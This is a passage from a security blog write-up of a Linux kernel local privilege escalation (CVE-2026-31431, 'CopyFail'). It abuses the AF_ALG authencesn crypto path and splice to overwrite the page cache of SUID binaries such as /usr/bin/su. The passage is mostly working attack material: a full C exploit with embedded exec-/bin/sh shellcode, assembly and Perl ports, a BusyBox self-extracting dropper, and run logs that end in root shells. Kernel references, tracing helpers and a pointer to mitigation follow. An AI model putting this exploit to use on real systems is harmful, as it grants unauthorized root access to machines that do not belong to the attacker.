groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
We can also use other msfvenom payloads, such as a reverse shell payload, meterpreter, any Bash commands, etc.
7.3.2 C Exploit Script
Drop the final replacement bytes into PAYLOAD_BYTES. By default, this example uses the x86_64 exec("/bin/sh") payload:
/**
* Title : CopyFail CVE-2026-31431 Linux LPE exploit
* Date : 2026-05-15
* Author : Axura (@4xura) - https://4xura.com
*
* Description:
* ------------
* Uses AF_ALG + authencesn(hmac(sha256),cbc(aes)) to turn a 4-byte
* destination-side scratch write into a page-cache overwrite primitive.
* The exploit places the controlled 4-byte value in AAD[4:8], splices a
* file-backed page range into the AEAD request, triggers decrypt, and
* repeats that primitive until the replacement payload is staged into the
* target executable's page cache.
*
* Usage:
* ------
* gcc -static -Wall -Wextra -O2 -o exploit exploit.c
* ./exploit
* DEBUG=1 ./exploit
* ./exploit <target_basename>
*
* Notes:
* ------
* Replace PAYLOAD_BYTES with the final replacement byte sequence to stage
* into the target executable for arbitrary code execution.
* The default target is /usr/bin/su. Authentication failure during recv()
* is expected; the exploit only requires authencesn() to execute far enough
* for the 4-byte scratch write to occur before the error is returned.
* Provided for educational use. Use responsibly.
*
*/
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/if_alg.h>
#include <linux/rtnetlink.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
enum {
CRYPTO_AUTHENC_KEYA_UNSPEC,
CRYPTO_AUTHENC_KEYA_PARAM,
};
struct crypto_authenc_key_param {
uint32_t enckeylen;
};
static int debug_enabled;
static void die(const char *msg)
{
perror(msg);
exit(EXIT_FAILURE);
}
/*
* [ SHELLCODE ]
* Replacement bytes to stage into the target executable.
*
* Each loop iteration below consumes 4 bytes from this array and turns them
* into one page-cache overwrite primitive.
*/
static const unsigned char PAYLOAD_BYTES[] = {
/* TODO: insert replacement bytes here (default: exec("/bin/sh)) */
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x80, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x40, 0x00, 0x03, 0x00, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xff, 0xb8, 0x69, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xeb, 0x00, 0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0xdb, 0x53, 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0, 0x3b, 0x0f, 0x05, 0x00, 0x2e, 0x73, 0x68, 0x73, 0x74, 0x72, 0x74, 0x61, 0x62, 0x00, 0x2e, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
static const size_t PAYLOAD_LEN = sizeof(PAYLOAD_BYTES);
static void open_authencesn_socket(int *tfm_fd, int *op_fd)
{
struct {
struct rtattr rta;
struct crypto_authenc_key_param param;
unsigned char keys[16 + 16];
} keyblob = {
.rta = {
.rta_len = RTA_LENGTH(sizeof(struct crypto_authenc_key_param)),
.rta_type = CRYPTO_AUTHENC_KEYA_PARAM,
},
.param = {
.enckeylen = htonl(16),
},
};
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
};
memset(keyblob.keys, 0x00, sizeof(keyblob.keys));
*tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (*tfm_fd < 0)
die("socket(AF_ALG)");
if (bind(*tfm_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0)
die("bind(authencesn)");
if (setsockopt(*tfm_fd, SOL_ALG, ALG_SET_KEY,
&keyblob, sizeof(keyblob)) < 0)
die("setsockopt(ALG_SET_KEY)");
if (setsockopt(*tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE,
NULL, 4) < 0)
die("setsockopt(ALG_SET_AEAD_AUTHSIZE)");
*op_fd = accept(*tfm_fd, NULL, NULL);
if (*op_fd < 0)
die("accept");
}
static void queue_aad(int op_fd, const unsigned char chunk[4])
{
unsigned char aad[8] = { 'A', 'A', 'A', 'A', chunk[0], chunk[1], chunk[2], chunk[3] };
unsigned char ivbuf[sizeof(struct af_alg_iv) + 16] = {0};
unsigned char cbuf[
CMSG_SPACE(sizeof(uint32_t)) +
CMSG_SPACE(sizeof(ivbuf)) +
CMSG_SPACE(sizeof(uint32_t))
] = {0};
struct af_alg_iv *iv = (void *)ivbuf;
struct iovec iov = {
.iov_base = aad,
.iov_len = sizeof(aad),
};
struct msghdr msg = {
.msg_iov = &iov,
.msg_iovlen = 1,
.msg_control = cbuf,
.msg_controllen = sizeof(cbuf),
};
struct cmsghdr *cmsg;
uint32_t op = 0; /* ALG_OP_DECRYPT */
uint32_t assoclen = 8;
/*
* AAD layout:
*
* +------+------+------+------+------+------+------+------+
* | A | A | A | A | w0 | w1 | w2 | w3 |
* +------+------+------+------+------+------+------+------+
*
* Bytes 4..7 become seqno_lo, which authencesn later writes.
*/
iv->ivlen = 16;
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_OP;
cmsg->cmsg_len = CMSG_LEN(sizeof(op));
memcpy(CMSG_DATA(cmsg), &op, sizeof(op));
cmsg = CMSG_NXTHDR(&msg, cmsg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_IV;
cmsg->cmsg_len = CMSG_LEN(sizeof(ivbuf));
memcpy(CMSG_DATA(cmsg), ivbuf, sizeof(ivbuf));
cmsg = CMSG_NXTHDR(&msg, cmsg);
cmsg->cmsg_level = SOL_ALG;
cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;
cmsg->cmsg_len = CMSG_LEN(sizeof(assoclen));
memcpy(CMSG_DATA(cmsg), &assoclen, sizeof(assoclen));
if (sendmsg(op_fd, &msg, MSG_MORE) < 0)
die("sendmsg(AAD)");
}
static void splice_target_window(int file_fd, int op_fd, off_t target_offset)
{
int pipefd[2];
loff_t splice_off = 0;
size_t splice_len = (size_t)target_offset + 4;
/*
* Imported layout:
*
* file[0 : target_offset] -> ciphertext region
* file[target_offset : +4] -> preserved tag tail
*
* authsize = 4 makes those last 4 imported bytes sit exactly where
* authencesn later performs its scratch write.
*/
if (pipe(pipefd) < 0)
die("pipe");
if (splice(file_fd, &splice_off, pipefd[1], NULL, splice_len, 0) < 0)
die("splice(file -> pipe)");
if (splice(pipefd[0], NULL, op_fd, NULL, splice_len, 0) < 0)
die("splice(pipe -> AF_ALG)");
close(pipefd[0]);
close(pipefd[1]);
}
static void trigger_decrypt(int op_fd, off_t target_offset)
{
size_t rx_len = (size_t)target_offset + 8;
unsigned char *outbuf = malloc(rx_len);
ssize_t n;
if (!outbuf)
die("malloc(recv)");
n = recv(op_fd, outbuf, rx_len, 0);
if (debug_enabled && n < 0)
printf(" [-] recv() returned: %s\n", strerror(errno));
free(outbuf);
}
static void overwrite_4_bytes(int file_fd, off_t target_offset, const unsigned char chunk[4])
{
int tfm_fd, op_fd;
if (debug_enabled) {
printf("[+] overwrite @ 0x%llx: %02x%02x%02x%02x\n",
(unsigned long long)target_offset,
chunk[0], chunk[1], chunk[2], chunk[3]);
}
open_authencesn_socket(&tfm_fd, &op_fd);
queue_aad(op_fd, chunk);
splice_target_window(file_fd, op_fd, target_offset);
trigger_decrypt(op_fd, target_offset);
close(op_fd);
close(tfm_fd);
}
int main(int argc, char **argv)
{
const char *target = "/usr/bin/su";
int file_fd;
size_t i;
if (getenv("DEBUG"))
debug_enabled = 1;
if (argc > 1) {
static char path[256];
snprintf(path, sizeof(path), "/usr/bin/%s", argv[1]);
target = path;
}
printf("[+] target : %s\n", target);
printf("[+] payload : %zu bytes\n", PAYLOAD_LEN);
printf("[+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write\n");
file_fd = open(target, O_RDONLY);
if (file_fd < 0)
die("open(target)");
for (i = 0; i < PAYLOAD_LEN; i += 4)
overwrite_4_bytes(file_fd, (off_t)i, PAYLOAD_BYTES + i);
close(file_fd);
printf("[+] payload staged into page cache, executing target...\n");
execl("/bin/su", "su", NULL);
die("execl(su)");
return 0;
}Build:
gcc -Wall -Wextra -O2 -o exploit exploit.cOr better, build statically for portability:
gcc -static -Wall -Wextra -O2 -o exploit exploit.cThis version keeps the exploit logic and stays on widely available Linux userspace interfaces. Unlike the Python version, it leaves the replacement byte stream explicit as PAYLOAD_BYTES, so the final staged content can be filled in directly without a separate compression step.
Pwned:
axura@pwnlab:~/lab/copy-fail$ vim exploit.c axura@pwnlab:~/lab/copy-fail$ gcc -static -Wall -Wextra -O2 -o exploit exploit.c axura@pwnlab:~/lab/copy-fail$ DEBUG=1 ./exploit [+] target : /usr/bin/su [+] payload : <depends on PAYLOAD_BYTES> bytes [+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write [+] overwrite @ 0x0: 7f454c46 [-] recv() returned: Bad message [+] overwrite @ 0x4: 02010100 [-] recv() returned: Bad message [+] overwrite @ 0x8: 00000000 [-] recv() returned: Bad message ... [+] overwrite @ 0x94: 0f052f62 [-] recv() returned: Bad message [+] overwrite @ 0x98: 696e2f73 [-] recv() returned: Bad message [+] overwrite @ 0x9c: 68000000 [-] recv() returned: Bad message [+] payload staged into page cache, executing target... # id uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
7.4 Assembly Exploit
After the C rewrite, the next step is stripping the exploit driver down to raw x86_64 Linux syscalls. This version is mainly useful as an advanced reference: it removes libc, removes language runtime glue, and makes the exploit flow visible almost one syscall at a time.
The canonical implementation is exploit-scripts/exploit.asm in the artifact repo.
This version does not call libc and does not depend on zlib. It embeds the final replacement ELF generated in 7.3.1.1 and drives the same 4-byte overwrite primitive entirely through direct syscalls:
payload:
incbin "payload.pwnkit.elf"
payload_end:
times 3 db 0
payload_len equ payload_end - payloadSo the build directory must already contain:
payload.pwnkit.elfbefore assembling the exploit, unless the incbin filename is changed.
The three zero bytes after
payload_endare only read padding for the final 4-byte chunk when the ELF size is not divisible by four.
At the control-flow level, the assembly version is still the same exploit:
| C helper | Assembly label | Syscalls used |
|---|---|---|
open_authencesn_socket() | open_authencesn_socket | socket, bind, setsockopt, accept |
queue_aad() | queue_aad_buf | sendmsg |
splice_target_window() | splice_target_window | pipe, splice, splice |
trigger_decrypt() | trigger_decrypt | recvfrom |
main() loop | .patch_loop | repeats the 4-byte primitive over payload.pwnkit.elf |
The only interface simplification is target selection. The C version accepts a basename and builds /usr/bin/<name>. The assembly version treats argv[1] as a full path, while no argument defaults to /usr/bin/su. After staging, it executes that same target path.
Build:
nasm -f elf64 exploit.asm -o exploit.o
ld -o exploit_asm exploit.oRun against /usr/bin/su:
./exploit_asmOr pass a full target path to any root-owned SUID binary:
./exploit_asm /usr/bin/chshOn the lab machine, the compact ELF from 7.3.1.1 stages cleanly and the assembly driver reaches the same end state as the C and Python versions:
axura@pwnlab:~/lab/copy-fail$ ./exploit_asm /usr/bin/chsh [+] target : /usr/bin/chsh [+] payload staged into page cache, executing target... # id uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin) # whoami root
7.5 Perl Exploit
Perl is worth adding because many Linux systems still ship it by default even when Python development packages, compilers, or nasm are absent.
This port keeps the same exploit geometry as the C and assembly versions, but uses built-in syscall() only: no CPAN modules, no Compress::Zlib, and no shellcode generation inside the script itself. Instead, it reads the external ELF payload from 7.3.1.1, packs the required AF_ALG structs in userland, and drives the same syscall chain:
socket → bind → setsockopt → accept → sendmsg → splice → recvfrom
The canonical implementation is in the artifact repo: exploit-scripts/exploit.pl.
Usage:
perl exploit.pl
perl exploit.pl /usr/bin/su ./payload.pwnkit.elf
DEBUG=1 perl exploit.pl # prints per-chunk overwriteWe can specify a victim SUID binary and the the ELF payload (e.g. payload.pwnkit.elf from 7.3.1.1) we want to execute with kernel priv:
axura@pwnlab:~/lab/copy-fail$ perl exploit.pl /usr/bin/passwd payload.pwnkit.elf [+] target : /usr/bin/passwd [+] payload : 376 bytes from payload.pwnkit.elf [+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write [+] payload staged into page cache, executing target... # id uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin) # whoami root
7.6 BusyBox-only Exploit
There is an important limit here: a pure BusyBox shell script cannot directly perform the full exploit primitive. The exploit needs socket(AF_ALG), setsockopt(), sendmsg() with ancillary control messages, splice(), and recvfrom(). BusyBox applets do not expose that syscall shape.
So a realistic BusyBox-only path is a self-extracting runner:
- build the syscall exploit once, for example the assembly version from 7.4
- build the compact
payload.pwnkit.elffrom 7.3.1.1 - pack both files into one BusyBox-compatible shell script
- on the target, the script uses only BusyBox
shandprintfto reconstruct the files under/tmp, then runs the exploit
This is useful on constrained systems where BusyBox is present but Python, Perl, gcc, nasm, and package managers are not.
The packer is kept in the artifact repo as exploit-scripts/mk_busybox_dropper.sh:
#!/bin/sh
#
# Build a BusyBox-compatible self-extracting CopyFail runner.
#
# Usage:
# sh mk_busybox_dropper.sh ./exploit_asm ./payload.pwnkit.elf > copyfail-busybox.sh
# busybox sh copyfail-busybox.sh /usr/bin/su
#
# The generated script uses only common BusyBox applets: sh, printf, chmod,
# mkdir, rm, cd, and exec.
set -eu
if [ "$#" -ne 2 ]; then
echo "usage: $0 <exploit_asm> <payload.pwnkit.elf>" >&2
exit 1
fi
exploit_bin=$1
payload_elf=$2
[ -r "$exploit_bin" ] || { echo "cannot read exploit binary: $exploit_bin" >&2; exit 1; }
[ -r "$payload_elf" ] || { echo "cannot read payload ELF: $payload_elf" >&2; exit 1; }
emit_file() {
src=$1
dst=$2
printf "write_blob \"%s\" <<'__COPYFAIL_BLOB__'\n" "$dst"
od -An -tx1 -v "$src" |
awk '
{
for (i = 1; i <= NF; i++) {
buf = buf "\\x" $i
if (length(buf) >= 192) {
print buf
buf = ""
}
}
}
END {
if (length(buf))
print buf
}'
printf "__COPYFAIL_BLOB__\n"
}
cat <<'EOF'
#!/bin/sh
set -eu
d=${TMPDIR:-/tmp}/.copyfail.$$
mkdir "$d" || exit 1
trap 'rm -rf "$d"' EXIT HUP INT TERM
umask 077
write_blob() {
out=$1
: > "$out"
while IFS= read -r line; do
[ "$line" = "__COPYFAIL_BLOB__" ] && break
printf '%b' "$line" >> "$out"
done
}
EOF
emit_file "$exploit_bin" '$d/exploit_asm'
emit_file "$payload_elf" '$d/payload.pwnkit.elf'
cat <<'EOF'
chmod 700 "$d/exploit_asm"
cd "$d"
exec ./exploit_asm "${1:-/usr/bin/su}"
EOFGenerate the BusyBox artifact on a build-capable lab machine:
nasm -f elf64 exploit.asm -o exploit.o
ld -o exploit_asm exploit.o
sh mk_busybox_dropper.sh ./exploit_asm ./payload.pwnkit.elf > copyfail-busybox.sh
chmod +x copyfail-busybox.shThen run the generated artifact on the constrained target:
busybox sh ./copyfail-busybox.sh /usr/bin/suPwned:
axura@pwnlab:~/lab/copy-fail$ sh mk_busybox_dropper.sh ./exploit_asm ./payload.pwnkit.elf > copyfail-busybox.sh axura@pwnlab:~/lab/copy-fail$ chmod +x copyfail-busybox.sh axura@pwnlab:~/lab/copy-fail$ busybox sh ./copyfail-busybox.sh /usr/bin/su [+] target : /usr/bin/su [+] payload staged into page cache, executing target... # id uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin) # whoami root
That generated script wrote two files into a private temporary directory:
$TMPDIR/.copyfail.$$/exploit_asm
$TMPDIR/.copyfail.$$/payload.pwnkit.elfThen it changed into that directory and executes:
./exploit_asm /usr/bin/suThis keeps the target-side dependency set small. The target does not need nasm, ld, gcc, Python, Perl, base64, xxd, or uudecode; the generated script only relies on BusyBox shell behavior and printf '%b' handling \xNN byte escapes.
8 Appendix
The companion scripts, exploit variants, and tracing helpers referenced throughout this writeup are collected in the artifact repo: 4xura/CVE-2026-31431-CopyFail.
8.1 Kernel Source References
| Keyword | Why it matters |
|---|---|
filemap_splice_read() | regular file bytes enter the splice path from page cache |
splice_folio_into_pipe() | a cached file folio becomes a pipe-backed page reference |
do_splice() | generic splice dispatcher |
struct pipe_buffer | metadata object that carries the spliced page |
alg_bind() | resolves sockaddr_alg into the requested AF_ALG family |
af_alg_sendmsg() | imports AAD and MSG_SPLICE_PAGES input into AF_ALG |
extract_iter_to_sg() | converts the page-backed iterator into TX scatterlist entries |
aead_sendmsg() | AEAD socket wrapper above af_alg_sendmsg() |
_aead_recvmsg() | builds the final decrypt request layout |
struct aead_request | final crypto-layer request object |
crypto_authenc_esn_decrypt() | vulnerable decrypt callback |
scatterwalk_map_and_copy() | walker that performs the destination-side scratch write |
crypto_authenc_extractkeys() | parses the authenc key blob used by ALG_SET_KEY |
8.2 Important Structures Cheat Sheet
| Keyword | Role in this bug |
|---|---|
struct address_space | per-file page-cache mapping |
struct inode | owns i_mapping / cached file state |
struct pipe_inode_info | ring of pipe buffers |
struct pipe_buffer | page-backed slot moved through splice |
struct sockaddr_alg | selects aead and authencesn(...) |
struct msghdr | carries AAD and AF_ALG control messages |
struct cmsghdr | wraps ALG_SET_OP, ALG_SET_IV, ALG_SET_AEAD_ASSOCLEN |
struct af_alg_iv | 16-byte IV wrapper for ALG_SET_IV |
struct aead_request | final decrypt request submitted to crypto core |
struct scatterlist | chained request layout behind RX/TX buffers |
8.3 Syscall Cheat Sheet
| Syscall / API | Used for |
|---|---|
socket(AF_ALG, SOCK_SEQPACKET, 0) | open crypto transform socket |
bind() | select authencesn(hmac(sha256),cbc(aes)) |
setsockopt(ALG_SET_KEY) | install valid authenc key blob |
setsockopt(ALG_SET_AEAD_AUTHSIZE) | set authsize = 4 |
accept() | create AEAD operation socket |
sendmsg() | queue AAD and AF_ALG control messages |
pipe() | create splice bridge |
splice(file -> pipe) | import target file page |
splice(pipe -> socket) | hand page-backed data to AF_ALG |
recv() / recvfrom() | trigger decrypt path and scratch write |
execve() | execute corrupted cached target |
8.4 Bpftrace Scripts
Check probe availability first:
sudo cat /proc/kallsyms | grep -E \
'filemap_splice_read|splice_folio_into_pipe|af_alg_sendmsg|extract_iter_to_sg|crypto_authenc_esn_decrypt|scatterwalk_map_and_copy'File page enters page-cache splice path:
bpftrace-scripts/bpftrace-filemap-splice.bt
sudo bpftrace ./bpftrace-scripts/bpftrace-filemap-splice.btPipe data reaches AF_ALG:
bpftrace-scripts/bpftrace-af-alg-sendmsg.bt
sudo bpftrace ./bpftrace-scripts/bpftrace-af-alg-sendmsg.btVulnerable decrypt callback runs:
bpftrace-scripts/bpftrace-authencesn-decrypt.bt
sudo bpftrace ./bpftrace-scripts/bpftrace-authencesn-decrypt.bt8.5 Mitigation
See Copy Fail — CVE-2026-31431 while this writeup focus on an attacker perspective.
Comments | NOTHING